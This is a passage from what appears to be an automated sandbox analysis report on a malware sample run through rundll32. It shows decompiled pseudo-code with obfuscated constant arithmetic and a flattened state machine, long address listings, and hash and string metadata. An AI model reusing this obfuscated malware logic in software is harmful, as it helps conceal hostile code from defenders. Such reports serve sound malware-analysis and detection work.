				_v268 = _v268 | 0x4d165578;
				_v268 = _v268 >> 4;
				_v268 = _v268 ^ 0x06d55fab;
				_v212 = 0x705526;
				_v212 = _v212 >> 0xa;
				_v212 = _v212 << 9;
				_v212 = _v212 >> 8;
				_v212 = _v212 ^ 0x000b72c4;
				_v92 = 0xc8093b;
				_v92 = _v92 + 0xd043;
				_v92 = _v92 ^ 0x00ca3bde;
				_v264 = 0x1f9619;
				_v264 = _v264 + 0xffffbc34;
				_v264 = _v264 * 0x3e;
				_v264 = _v264 * 0x52;
				_v264 = _v264 ^ 0x6e0edc82;
				_v96 = 0x6d9960;
				_v96 = _v96 | 0x9fb7a8f9;
				_v96 = _v96 ^ 0x9ff35e32;
				_v144 = 0x447df2;
				_v144 = _v144 << 8;
				_v144 = _v144 + 0xffff6cb2;
				_v144 = _v144 ^ 0x44714589;
				_v240 = 0x65db08;
				_v240 = _v240 * 6;
				_v240 = _v240 + 0x5f97;
				_v240 = _v240 >> 0xd;
				_v240 = _v240 ^ 0x000293b4;
				_v84 = 0x3c7c20;
				_v84 = _v84 ^ 0x2c3d49c2;
				_v84 = _v84 ^ 0x2c080053;
				_v248 = 0x13c85;
				_v248 = _v248 + 0x8cd8;
				_v248 = _v248 + 0x6e3d;
				_v248 = _v248 ^ 0xe59eace5;
				_v248 = _v248 ^ 0xe5984999;
				_v216 = 0x6164ef;
				_v216 = _v216 << 6;
				_v216 = _v216 + 0xffff2edc;
				_v216 = _v216 | 0xa66c888f;
				_v216 = _v216 ^ 0xbe7947d5;
				_v232 = 0x991e82;
				_v232 = _v232 + 0xffff48fb;
				_v232 = _v232 >> 0xe;
				_v232 = _v232 | 0x69e4ac2c;
				_v232 = _v232 ^ 0x69ef7d1b;
				_v68 = 0x9d94b2;
				_v68 = _v68 | 0xcead792c;
				_v68 = _v68 ^ 0xceb9e800;
				_v44 = 0x20071e;
				_v44 = _v44 / _t971;
				_v44 = _v44 ^ 0x000a654c;
				_v128 = 0x223cb7;
				_v128 = _v128 + 0x9bf0;
				_v128 = _v128 | 0x79b7d361;
				_v128 = _v128 ^ 0x79b3b147;
				_v52 = 0x8ed203;
				_v52 = _v52 + 0xffff1a7b;
				_v52 = _v52 ^ 0x008be8c4;
				_v208 = 0xe0ac17;
				_v208 = _v208 ^ 0xbcfe8cf2;
				_t972 = 0x6b;
				_v208 = _v208 / _t972;
				_v208 = _v208 | 0x3ee9ec5f;
				_v208 = _v208 ^ 0x3fec9c1d;
				_v192 = 0x219bfa;
				_v192 = _v192 >> 4;
				_v192 = _v192 + 0x77e4;
				_v192 = _v192 | 0x2fb4141c;
				_v192 = _v192 ^ 0x2fb2076e;
				_v200 = 0x8926e2;
				_v200 = _v200 << 4;
				_t973 = 0xc;
				_v200 = _v200 / _t973;
				_v200 = _v200 + 0xffff5704;
				_v200 = _v200 ^ 0x00bbfbcc;
				_v284 = 0xaed0cb;
				_v284 = _v284 + 0x9c17;
				_v284 = _v284 + 0xaf6d;
				_v284 = _v284 ^ 0x00b89bc1;
				_v168 = 0x914ce9;
				_v168 = _v168 | 0xceb3d4af;
				_v168 = _v168 ^ 0x5adaba1c;
				_v168 = _v168 ^ 0x3c292fbf;
				_v168 = _v168 ^ 0xa84ea968;
				_v156 = 0x90c891;
				_v156 = _v156 + 0xffff3667;
				_t974 = 0x5c;
				_v156 = _v156 / _t974;
				_t975 = 0x3c;
				_v156 = _v156 / _t975;
				_v156 = _v156 ^ 0x000da682;
				_v140 = 0xffcb83;
				_v140 = _v140 << 0xd;
				_v140 = _v140 | 0xcebab625;
				_v140 = _v140 ^ 0xfff71570;
				_v280 = 0xfef1ee;
				_v280 = _v280 >> 8;
				_v280 = _v280 + 0xffff306e;
				_v280 = _v280 | 0x3331510b;
				_v280 = _v280 ^ 0x3338227a;
				_v176 = 0xc7331d;
				_v176 = _v176 >> 7;
				_v176 = _v176 + 0x1d50;
				_v176 = _v176 << 5;
				_v176 = _v176 ^ 0x00370898;
				_v288 = 0x519041;
				_v288 = _v288 + 0x7cd9;
				_v288 = _v288 ^ 0x0057f5a9;
				_t976 = _v12;
				_t986 = _v12;
				while(1) {
					L1:
					_t939 = 0x68a9e90;
					while(1) {
						_t823 = _v184;
						while(1) {
							L3:
							_t991 = _t977 - _t939;
							if(_t991 > 0) {
								break;
							}
							if(_t991 == 0) {
								__eflags =  *_v8;
								if(__eflags != 0) {
									_push(_v104);
									_push(_v20);
									_t868 = E0069DCF7(_v164, 0x681524, __eflags);
									_v276 = _t868;
								}
								_t845 = _v244 | _v196 | _v108 | _v236 | _v132 | _v172 | _v64 | _v228 | _v116;
								_t981 = _a44 & 1;
								__eflags = _t981;
								if(_t981 != 0) {
									__eflags = _t845;
								}
								_push(_t868);
								_t976 = E006875FA(_t868, _t845, _v272, _t868, _v16, _a16, _v56, _v32, _v124, _t868, _v220, _v188, _v184);
								E0068A8B0(_v268, _v276, _v212);
								_t988 =  &(_t988[0xe]);
								__eflags = _t976;
								if(_t976 == 0) {
									_t977 = 0x51daea9;
								} else {
									_push(_v96);
									_push(_v264);
									_push(_v256);
									_v60 = 1;
									_push( &_v60);
									_push(_v92);
									_t948 = 4;
									E00689670(_t976, _t948);
									_t988 =  &(_t988[5]);
									__eflags = _t981;
									if(_t981 != 0) {
										E0069408E( &_v12, _v76, _v144, _v240, _t976,  &_v60, _v84, _v248);
										_t732 =  &_v60;
										 *_t732 = _v60 | _v136;
										__eflags =  *_t732;
										E00689670(_t976, _v12, _v216,  &_v60, _v224, _v232, _v68);
										_t988 =  &(_t988[0xb]);
									}
									_t977 = 0xbee37f5;
								}
								L11:
								_t868 = _v276;
								goto L1;
							}
							if(_t977 == 0x2602436) {
								_t977 = 0x506ebc3;
								continue;
							}
							if(_t977 == 0x329d839) {
								_t977 = 0x2602436;
								continue;
							}
							if(_t977 == 0x4bb42fe) {
								_t823 = E006888C3(_v100, _v148, _v40, _t868, _t868, _t986, _v252, _v80, _a36, _v24, _t868, _v4, _t868, _v204, _v260);
								_t868 = _v276;
								_t988 =  &(_t988[0xd]);
								__eflags = _t823;
								_v184 = _t823;
								_t939 = 0x68a9e90;
								_t977 =  !=  ? 0x68a9e90 : 0x9a35046;
								continue;
							}
							if(_t977 == 0x506ebc3) {
								_push(_t868);
								_push(_v72);
								_push(_v160);
								_push(_v28);
								_push(_v152);
								_t858 = E0069DAC6(_v112, _v180);
								_t986 = _t858;
								__eflags = _t858;
								_t977 =  !=  ? 0x4bb42fe : 0xdf8c541;
								E00698519(_v88, _v48, 0);
								_t988 = _t988 - 0xc + 0x24;
								L37:
								_t868 = _v276;
								_t939 = 0x68a9e90;
								L38:
								__eflags = _t977 - 0xdf8c541;
								if(_t977 == 0xdf8c541) {
									L41:
									return _t862;
								}
								_t823 = _v184;
								continue;
							}
							if(_t977 != 0x51daea9) {
								goto L38;
							}
							E00682B62(_v168, _t823, _v156, _v140);
							_t977 = 0x9a35046;
							goto L11;
						}
						__eflags = _t977 - 0x81a6b17;
						if(_t977 == 0x81a6b17) {
							E00682B62(_v192, _t976, _v200, _v284);
							_t977 = 0x51daea9;
							goto L37;
						}
						__eflags = _t977 - 0x9a35046;
						if(_t977 == 0x9a35046) {
							E00682B62(_v280, _t986, _v176, _v288);
							goto L41;
						}
						__eflags = _t977 - 0xb70b8d2;
						if(_t977 == 0xb70b8d2) {
							__eflags = E0069A2E8(_t976, _a4);
							_t977 = 0x81a6b17;
							_t829 = 1;
							_t862 =  !=  ? _t829 : _t862;
							goto L11;
						}
						__eflags = _t977 - 0xba06d79;
						if(__eflags == 0) {
							__eflags = E006A09B5(_t976, _v120, __eflags) - _v36;
							_t977 =  ==  ? 0xb70b8d2 : 0x81a6b17;
							goto L11;
						}
						__eflags = _t977 - 0xbee37f5;
						if(_t977 != 0xbee37f5) {
							goto L38;
						}
						_t832 = _v8;
						_t888 =  *_t832;
						__eflags = _t888;
						if(_t888 == 0) {
							_t833 = 0;
							__eflags = 0;
						} else {
							_t833 = _t832[1];
						}
						E00682AE4(_v44, _t888, _t888, _a24, _t976, _v52, _t833, _v208);
						_t988 =  &(_t988[7]);
						asm("sbb esi, esi");
						_t977 = (_t977 & 0x03860262) + 0x81a6b17;
						goto L11;
					}
				}
			}

















































































































                                                                                                                      0x0069e39f
                                                                                                                      0x0069e3a8
                                                                                                                      0x0069e3af
                                                                                                                      0x0069e3b6
                                                                                                                      0x0069e3bd
                                                                                                                      0x0069e3c4
                                                                                                                      0x0069e3cb
                                                                                                                      0x0069e3d2
                                                                                                                      0x0069e3d9
                                                                                                                      0x0069e3e0
                                                                                                                      0x0069e3e7
                                                                                                                      0x0069e3ee
                                                                                                                      0x0069e3f5
                                                                                                                      0x0069e3fc
                                                                                                                      0x0069e400
                                                                                                                      0x0069e401
                                                                                                                      0x0069e406
                                                                                                                      0x0069e40e
                                                                                                                      0x0069e411
                                                                                                                      0x0069e41b
                                                                                                                      0x0069e422
                                                                                                                      0x0069e42a
                                                                                                                      0x0069e42c
                                                                                                                      0x0069e437
                                                                                                                      0x0069e445
                                                                                                                      0x0069e44a
                                                                                                                      0x0069e453
                                                                                                                      0x0069e45e
                                                                                                                      0x0069e469
                                                                                                                      0x0069e474
                                                                                                                      0x0069e47b
                                                                                                                      0x0069e486
                                                                                                                      0x0069e491
                                                                                                                      0x0069e4a4
                                                                                                                      0x0069e4a5
                                                                                                                      0x0069e4a9
                                                                                                                      0x0069e4b0
                                                                                                                      0x0069e4bb
                                                                                                                      0x0069e4c3
                                                                                                                      0x0069e4c8
                                                                                                                      0x0069e4d2
                                                                                                                      0x0069e4d6
                                                                                                                      0x0069e4de
                                                                                                                      0x0069e4e9
                                                                                                                      0x0069e4f4
                                                                                                                      0x0069e4ff
                                                                                                                      0x0069e50a
                                                                                                                      0x0069e515
                                                                                                                      0x0069e520
                                                                                                                      0x0069e52b
                                                                                                                      0x0069e536
                                                                                                                      0x0069e54a
                                                                                                                      0x0069e551
                                                                                                                      0x0069e55c
                                                                                                                      0x0069e564
                                                                                                                      0x0069e569
                                                                                                                      0x0069e576
                                                                                                                      0x0069e57a
                                                                                                                      0x0069e582
                                                                                                                      0x0069e58d
                                                                                                                      0x0069e5a0
                                                                                                                      0x0069e5a7
                                                                                                                      0x0069e5b2
                                                                                                                      0x0069e5bc
                                                                                                                      0x0069e5c4
                                                                                                                      0x0069e5cf
                                                                                                                      0x0069e5d4
                                                                                                                      0x0069e5d8
                                                                                                                      0x0069e5e0
                                                                                                                      0x0069e5e8
                                                                                                                      0x0069e5ed
                                                                                                                      0x0069e5f5
                                                                                                                      0x0069e5fa
                                                                                                                      0x0069e602
                                                                                                                      0x0069e60d
                                                                                                                      0x0069e618
                                                                                                                      0x0069e623
                                                                                                                      0x0069e632
                                                                                                                      0x0069e635
                                                                                                                      0x0069e636
                                                                                                                      0x0069e63a
                                                                                                                      0x0069e63f
                                                                                                                      0x0069e647
                                                                                                                      0x0069e64f
                                                                                                                      0x0069e65a
                                                                                                                      0x0069e665
                                                                                                                      0x0069e670
                                                                                                                      0x0069e680
                                                                                                                      0x0069e684
                                                                                                                      0x0069e690
                                                                                                                      0x0069e694
                                                                                                                      0x0069e69c
                                                                                                                      0x0069e6b2
                                                                                                                      0x0069e6b9
                                                                                                                      0x0069e6c4
                                                                                                                      0x0069e6cf
                                                                                                                      0x0069e6e1
                                                                                                                      0x0069e6e6
                                                                                                                      0x0069e6ed
                                                                                                                      0x0069e6f8
                                                                                                                      0x0069e707
                                                                                                                      0x0069e708
                                                                                                                      0x0069e70c
                                                                                                                      0x0069e714
                                                                                                                      0x0069e724
                                                                                                                      0x0069e728
                                                                                                                      0x0069e730
                                                                                                                      0x0069e73e
                                                                                                                      0x0069e742
                                                                                                                      0x0069e74a
                                                                                                                      0x0069e752
                                                                                                                      0x0069e75a
                                                                                                                      0x0069e762
                                                                                                                      0x0069e767
                                                                                                                      0x0069e76f
                                                                                                                      0x0069e777
                                                                                                                      0x0069e77f
                                                                                                                      0x0069e787
                                                                                                                      0x0069e791
                                                                                                                      0x0069e796
                                                                                                                      0x0069e79e
                                                                                                                      0x0069e7ac
                                                                                                                      0x0069e7b1
                                                                                                                      0x0069e7b7
                                                                                                                      0x0069e7bf
                                                                                                                      0x0069e7cb
                                                                                                                      0x0069e7d0
                                                                                                                      0x0069e7d6
                                                                                                                      0x0069e7de
                                                                                                                      0x0069e7ea
                                                                                                                      0x0069e7ef
                                                                                                                      0x0069e7f5
                                                                                                                      0x0069e7fd
                                                                                                                      0x0069e805
                                                                                                                      0x0069e80d
                                                                                                                      0x0069e815
                                                                                                                      0x0069e821
                                                                                                                      0x0069e826
                                                                                                                      0x0069e82c
                                                                                                                      0x0069e834
                                                                                                                      0x0069e83c
                                                                                                                      0x0069e841
                                                                                                                      0x0069e846
                                                                                                                      0x0069e84e
                                                                                                                      0x0069e859
                                                                                                                      0x0069e861
                                                                                                                      0x0069e869
                                                                                                                      0x0069e874
                                                                                                                      0x0069e87f
                                                                                                                      0x0069e88a
                                                                                                                      0x0069e895
                                                                                                                      0x0069e8a0
                                                                                                                      0x0069e8ab
                                                                                                                      0x0069e8b6
                                                                                                                      0x0069e8be
                                                                                                                      0x0069e8d0
                                                                                                                      0x0069e8d5
                                                                                                                      0x0069e8de
                                                                                                                      0x0069e8e9
                                                                                                                      0x0069e8f4
                                                                                                                      0x0069e8ff
                                                                                                                      0x0069e90a
                                                                                                                      0x0069e915
                                                                                                                      0x0069e920
                                                                                                                      0x0069e932
                                                                                                                      0x0069e935
                                                                                                                      0x0069e93c
                                                                                                                      0x0069e947
                                                                                                                      0x0069e952
                                                                                                                      0x0069e95d
                                                                                                                      0x0069e968
                                                                                                                      0x0069e973
                                                                                                                      0x0069e97e
                                                                                                                      0x0069e989
                                                                                                                      0x0069e99f
                                                                                                                      0x0069e9a4
                                                                                                                      0x0069e9ab
                                                                                                                      0x0069e9b6
                                                                                                                      0x0069e9ca
                                                                                                                      0x0069e9cf
                                                                                                                      0x0069e9d6
                                                                                                                      0x0069e9de
                                                                                                                      0x0069e9e9
                                                                                                                      0x0069e9f7
                                                                                                                      0x0069e9fc
                                                                                                                      0x0069ea00
                                                                                                                      0x0069ea05
                                                                                                                      0x0069ea0a
                                                                                                                      0x0069ea12
                                                                                                                      0x0069ea1d
                                                                                                                      0x0069ea28
                                                                                                                      0x0069ea33
                                                                                                                      0x0069ea48
                                                                                                                      0x0069ea49
                                                                                                                      0x0069ea50
                                                                                                                      0x0069ea5b
                                                                                                                      0x0069ea63
                                                                                                                      0x0069ea6b
                                                                                                                      0x0069ea73
                                                                                                                      0x0069ea7b
                                                                                                                      0x0069ea83
                                                                                                                      0x0069ea90
                                                                                                                      0x0069ea94
                                                                                                                      0x0069ea9c
                                                                                                                      0x0069eaa4
                                                                                                                      0x0069eaac
                                                                                                                      0x0069eabf
                                                                                                                      0x0069eac6
                                                                                                                      0x0069eace
                                                                                                                      0x0069ead9
                                                                                                                      0x0069eae4
                                                                                                                      0x0069eaef
                                                                                                                      0x0069eaf7
                                                                                                                      0x0069eb02
                                                                                                                      0x0069eb0d
                                                                                                                      0x0069eb15
                                                                                                                      0x0069eb1d
                                                                                                                      0x0069eb28
                                                                                                                      0x0069eb30
                                                                                                                      0x0069eb3d
                                                                                                                      0x0069eb41
                                                                                                                      0x0069eb49
                                                                                                                      0x0069eb51
                                                                                                                      0x0069eb67
                                                                                                                      0x0069eb6e
                                                                                                                      0x0069eb79
                                                                                                                      0x0069eb84
                                                                                                                      0x0069eb8c
                                                                                                                      0x0069eb97
                                                                                                                      0x0069ebab
                                                                                                                      0x0069ebb2
                                                                                                                      0x0069ebbd
                                                                                                                      0x0069ebc8
                                                                                                                      0x0069ebd2
                                                                                                                      0x0069ebda
                                                                                                                      0x0069ebe5
                                                                                                                      0x0069ebf4
                                                                                                                      0x0069ebf5
                                                                                                                      0x0069ebf9
                                                                                                                      0x0069ebfe
                                                                                                                      0x0069ec06
                                                                                                                      0x0069ec0e
                                                                                                                      0x0069ec16
                                                                                                                      0x0069ec23
                                                                                                                      0x0069ec27
                                                                                                                      0x0069ec2f
                                                                                                                      0x0069ec37
                                                                                                                      0x0069ec3f
                                                                                                                      0x0069ec47
                                                                                                                      0x0069ec4f
                                                                                                                      0x0069ec54
                                                                                                                      0x0069ec5c
                                                                                                                      0x0069ec64
                                                                                                                      0x0069ec69
                                                                                                                      0x0069ec6e
                                                                                                                      0x0069ec73
                                                                                                                      0x0069ec7b
                                                                                                                      0x0069ec86
                                                                                                                      0x0069ec91
                                                                                                                      0x0069ec9c
                                                                                                                      0x0069eca4
                                                                                                                      0x0069ecb1
                                                                                                                      0x0069ecba
                                                                                                                      0x0069ecbe
                                                                                                                      0x0069ecc6
                                                                                                                      0x0069ecd1
                                                                                                                      0x0069ecdc
                                                                                                                      0x0069ece7
                                                                                                                      0x0069ecf2
                                                                                                                      0x0069ecfa
                                                                                                                      0x0069ed05
                                                                                                                      0x0069ed10
                                                                                                                      0x0069ed1d
                                                                                                                      0x0069ed21
                                                                                                                      0x0069ed29
                                                                                                                      0x0069ed2e
                                                                                                                      0x0069ed36
                                                                                                                      0x0069ed41
                                                                                                                      0x0069ed4c
                                                                                                                      0x0069ed57
                                                                                                                      0x0069ed5f
                                                                                                                      0x0069ed67
                                                                                                                      0x0069ed6f
                                                                                                                      0x0069ed77
                                                                                                                      0x0069ed7f
                                                                                                                      0x0069ed87
                                                                                                                      0x0069ed8c
                                                                                                                      0x0069ed94
                                                                                                                      0x0069ed9c
                                                                                                                      0x0069eda4
                                                                                                                      0x0069edac
                                                                                                                      0x0069edb4
                                                                                                                      0x0069edb9
                                                                                                                      0x0069edc1
                                                                                                                      0x0069edc9
                                                                                                                      0x0069edd4
                                                                                                                      0x0069eddf
                                                                                                                      0x0069edea
                                                                                                                      0x0069edfe
                                                                                                                      0x0069ee05
                                                                                                                      0x0069ee10
                                                                                                                      0x0069ee1b
                                                                                                                      0x0069ee26
                                                                                                                      0x0069ee31
                                                                                                                      0x0069ee3c
                                                                                                                      0x0069ee49
                                                                                                                      0x0069ee54
                                                                                                                      0x0069ee5f
                                                                                                                      0x0069ee67
                                                                                                                      0x0069ee75
                                                                                                                      0x0069ee7a
                                                                                                                      0x0069ee80
                                                                                                                      0x0069ee88
                                                                                                                      0x0069ee90
                                                                                                                      0x0069ee98
                                                                                                                      0x0069ee9d
                                                                                                                      0x0069eea5
                                                                                                                      0x0069eead
                                                                                                                      0x0069eeb5
                                                                                                                      0x0069eebd
                                                                                                                      0x0069eec6
                                                                                                                      0x0069eecb
                                                                                                                      0x0069eed1
                                                                                                                      0x0069eed9
                                                                                                                      0x0069eee1
                                                                                                                      0x0069eee9
                                                                                                                      0x0069eef1
                                                                                                                      0x0069eef9
                                                                                                                      0x0069ef01
                                                                                                                      0x0069ef0c
                                                                                                                      0x0069ef17
                                                                                                                      0x0069ef22
                                                                                                                      0x0069ef2d
                                                                                                                      0x0069ef38
                                                                                                                      0x0069ef43
                                                                                                                      0x0069ef55
                                                                                                                      0x0069ef5a
                                                                                                                      0x0069ef6a
                                                                                                                      0x0069ef6d
                                                                                                                      0x0069ef74
                                                                                                                      0x0069ef7f
                                                                                                                      0x0069ef8a
                                                                                                                      0x0069ef92
                                                                                                                      0x0069ef9d
                                                                                                                      0x0069efa8
                                                                                                                      0x0069efb0
                                                                                                                      0x0069efb5
                                                                                                                      0x0069efbd
                                                                                                                      0x0069efc5
                                                                                                                      0x0069efcd
                                                                                                                      0x0069efd8
                                                                                                                      0x0069efe0
                                                                                                                      0x0069efeb
                                                                                                                      0x0069eff3
                                                                                                                      0x0069effe
                                                                                                                      0x0069f006
                                                                                                                      0x0069f00e
                                                                                                                      0x0069f016
                                                                                                                      0x0069f01d
                                                                                                                      0x0069f024
                                                                                                                      0x0069f024
                                                                                                                      0x0069f024
                                                                                                                      0x0069f029
                                                                                                                      0x0069f029
                                                                                                                      0x0069f02d
                                                                                                                      0x0069f02d
                                                                                                                      0x0069f02d
                                                                                                                      0x0069f02f
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069f035
                                                                                                                      0x0069f17e
                                                                                                                      0x0069f181
                                                                                                                      0x0069f183
                                                                                                                      0x0069f18f
                                                                                                                      0x0069f1a4
                                                                                                                      0x0069f1a6
                                                                                                                      0x0069f1a6
                                                                                                                      0x0069f1e0
                                                                                                                      0x0069f1e7
                                                                                                                      0x0069f1e7
                                                                                                                      0x0069f1e9
                                                                                                                      0x0069f1eb
                                                                                                                      0x0069f1eb
                                                                                                                      0x0069f1f0
                                                                                                                      0x0069f237
                                                                                                                      0x0069f23d
                                                                                                                      0x0069f242
                                                                                                                      0x0069f245
                                                                                                                      0x0069f247
                                                                                                                      0x0069f2ff
                                                                                                                      0x0069f24d
                                                                                                                      0x0069f24d
                                                                                                                      0x0069f258
                                                                                                                      0x0069f25d
                                                                                                                      0x0069f261
                                                                                                                      0x0069f26f
                                                                                                                      0x0069f270
                                                                                                                      0x0069f279
                                                                                                                      0x0069f27a
                                                                                                                      0x0069f27f
                                                                                                                      0x0069f282
                                                                                                                      0x0069f284
                                                                                                                      0x0069f2b3
                                                                                                                      0x0069f2c8
                                                                                                                      0x0069f2c8
                                                                                                                      0x0069f2c8
                                                                                                                      0x0069f2ed
                                                                                                                      0x0069f2f2
                                                                                                                      0x0069f2f2
                                                                                                                      0x0069f2f5
                                                                                                                      0x0069f2f5
                                                                                                                      0x0069f096
                                                                                                                      0x0069f096
                                                                                                                      0x00000000
                                                                                                                      0x0069f096
                                                                                                                      0x0069f041
                                                                                                                      0x0069f16d
                                                                                                                      0x00000000
                                                                                                                      0x0069f16d
                                                                                                                      0x0069f04d
                                                                                                                      0x0069f163
                                                                                                                      0x00000000
                                                                                                                      0x0069f163
                                                                                                                      0x0069f059
                                                                                                                      0x0069f13f
                                                                                                                      0x0069f144
                                                                                                                      0x0069f148
                                                                                                                      0x0069f14b
                                                                                                                      0x0069f14d
                                                                                                                      0x0069f156
                                                                                                                      0x0069f15b
                                                                                                                      0x00000000
                                                                                                                      0x0069f15b
                                                                                                                      0x0069f065
                                                                                                                      0x0069f09c
                                                                                                                      0x0069f09d
                                                                                                                      0x0069f0a4
                                                                                                                      0x0069f0ab
                                                                                                                      0x0069f0b5
                                                                                                                      0x0069f0ca
                                                                                                                      0x0069f0d6
                                                                                                                      0x0069f0df
                                                                                                                      0x0069f0ed
                                                                                                                      0x0069f0f0
                                                                                                                      0x0069f0f5
                                                                                                                      0x0069f3fa
                                                                                                                      0x0069f3fa
                                                                                                                      0x0069f3fe
                                                                                                                      0x0069f403
                                                                                                                      0x0069f403
                                                                                                                      0x0069f409
                                                                                                                      0x0069f42b
                                                                                                                      0x0069f434
                                                                                                                      0x0069f434
                                                                                                                      0x0069f029
                                                                                                                      0x00000000
                                                                                                                      0x0069f029
                                                                                                                      0x0069f06d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069f08a
                                                                                                                      0x0069f091
                                                                                                                      0x00000000
                                                                                                                      0x0069f091
                                                                                                                      0x0069f309
                                                                                                                      0x0069f30f
                                                                                                                      0x0069f3ee
                                                                                                                      0x0069f3f5
                                                                                                                      0x00000000
                                                                                                                      0x0069f3f5
                                                                                                                      0x0069f315
                                                                                                                      0x0069f31b
                                                                                                                      0x0069f421
                                                                                                                      0x00000000
                                                                                                                      0x0069f427
                                                                                                                      0x0069f326
                                                                                                                      0x0069f328
                                                                                                                      0x0069f3ce
                                                                                                                      0x0069f3d0
                                                                                                                      0x0069f3d7
                                                                                                                      0x0069f3d8
                                                                                                                      0x00000000
                                                                                                                      0x0069f3d8
                                                                                                                      0x0069f32e
                                                                                                                      0x0069f334
                                                                                                                      0x0069f3b1
                                                                                                                      0x0069f3b8
                                                                                                                      0x00000000
                                                                                                                      0x0069f3b8
                                                                                                                      0x0069f336
                                                                                                                      0x0069f33c
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0069f342
                                                                                                                      0x0069f349
                                                                                                                      0x0069f34b
                                                                                                                      0x0069f34d
                                                                                                                      0x0069f354
                                                                                                                      0x0069f354
                                                                                                                      0x0069f34f
                                                                                                                      0x0069f34f
                                                                                                                      0x0069f34f
                                                                                                                      0x0069f37a
                                                                                                                      0x0069f37f
                                                                                                                      0x0069f384
                                                                                                                      0x0069f38c
                                                                                                                      0x00000000
                                                                                                                      0x0069f38c
                                                                                                                      0x0069f029

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: |<$!b$$Fy$&Up$*b$7vM$<3$$=n$C$K1$Le$PZY$S$_>$z"83$u$0G$da$w
                                                                                                                      • API String ID: 0-3417817227
                                                                                                                      • Opcode ID: 613e668a931c6fe6e00fc100f24d35d5e931325cbcc48035c2cd1239f6ae4419
                                                                                                                      • Instruction ID: e22283a6dfe9b9976d3d34ad4da2edc3f947d8675ac2db9eed7d860d1a082432
                                                                                                                      • Opcode Fuzzy Hash: 613e668a931c6fe6e00fc100f24d35d5e931325cbcc48035c2cd1239f6ae4419
                                                                                                                      • Instruction Fuzzy Hash: 08820F71508381CFD778CF25C54AA8BBBE2BBD4718F108A2DE1D996260D7B58949CF83
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0068BB7E Relevance: 23.1, Strings: 18, Instructions: 637COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0068BB7E(intOrPtr* __ecx) {
				char _v68;
				char _v76;
				void* _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr* _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				signed int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				void* _t690;
				void* _t691;
				void* _t697;
				void* _t700;
				void* _t701;
				void* _t704;
				void* _t710;
				char _t711;
				void* _t713;
				void* _t717;
				void* _t719;
				void* _t725;
				signed int _t732;
				signed int _t733;
				signed int _t734;
				signed int _t735;
				signed int _t736;
				signed int _t737;
				signed int _t738;
				signed int _t739;
				signed int _t740;
				signed int _t741;
				signed int _t742;
				signed int _t743;
				signed int _t744;
				signed int _t745;
				signed int _t746;
				void* _t747;
				void* _t763;
				void* _t772;
				void* _t819;
				intOrPtr _t834;
				void* _t840;
				void* _t842;
				void* _t846;
				void* _t847;
				void* _t850;

				_v92 = 0xf68129;
				_v100 = __ecx;
				asm("stosd");
				_t732 = 0x6b;
				asm("stosd");
				_t846 = 0;
				_t725 = 0x7252bf3;
				asm("stosd");
				_v136 = 0x5ab987;
				_v136 = _v136 * 0x2c;
				_v136 = _v136 ^ 0x0f97e334;
				_v240 = 0x5f59f0;
				_v240 = _v240 << 5;
				_v240 = _v240 * 0x46;
				_v240 = _v240 ^ 0x4252f400;
				_v320 = 0x63212;
				_v320 = _v320 + 0xffffd9b7;
				_v320 = _v320 * 0x26;
				_v320 = _v320 + 0xffff4af1;
				_v320 = _v320 ^ 0x00e50ac7;
				_v192 = 0x354250;
				_t26 =  &_v192; // 0x354250
				_v192 =  *_t26 * 0x43;
				_v192 = _v192 ^ 0x0df05af0;
				_v308 = 0x42c709;
				_v308 = _v308 | 0x3400f9ef;
				_v308 = _v308 << 3;
				_v308 = _v308 + 0x3df1;
				_v308 = _v308 ^ 0xa2183d69;
				_v152 = 0x5369e0;
				_v152 = _v152 ^ 0xff6c3c62;
				_v152 = _v152 ^ 0xff3f5582;
				_v276 = 0x14bd80;
				_v276 = _v276 << 5;
				_v276 = _v276 ^ 0x5f90d5fe;
				_v276 = _v276 / _t732;
				_v276 = _v276 ^ 0x00de92e5;
				_v164 = 0xc6025f;
				_t733 = 0x77;
				_v164 = _v164 / _t733;
				_v164 = _v164 ^ 0x0001a9f8;
				_v196 = 0xc87c9f;
				_v196 = _v196 + 0x15df;
				_v196 = _v196 ^ 0x00c8927e;
				_v316 = 0xe66987;
				_v316 = _v316 ^ 0x1b2582a6;
				_t734 = 0x3b;
				_v316 = _v316 * 0x5b;
